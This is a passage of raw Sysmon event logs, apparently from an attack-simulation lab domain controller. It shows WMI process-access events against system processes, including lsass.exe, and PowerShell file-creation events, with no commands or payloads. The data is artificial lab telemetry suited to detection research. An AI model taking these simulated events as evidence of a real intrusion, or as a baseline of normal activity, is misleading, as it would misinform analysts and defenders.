16:54:43.358{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242994Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.358{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242993Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.358{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242992Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.358{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242991Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.358{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242990Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.358{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242989Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.358{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242988Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.358{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242987Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.358{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242986Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.358{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242985Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.358{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242984Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.358{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242983Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.358{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242982Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.358{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242981Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.358{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002242980Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.358{05ADC7E1-6DD3-603E-D6AA-00000000AD01}10156ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002242979Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.358{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242978Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.342{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-6DD3-603E-DDAA-00000000AD01}5224C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 11241100x80000000000000002242977Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.342{05ADC7E1-6DD3-603E-DAAA-00000000AD01}13472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_rzytgocn.c5b.ps12021-03-02 16:54:43.342 10341000x80000000000000002242976Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.342{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-6DD3-603E-DCAA-00000000AD01}11576C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002242975Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.342{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242974Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.342{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242973Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.342{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242972Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 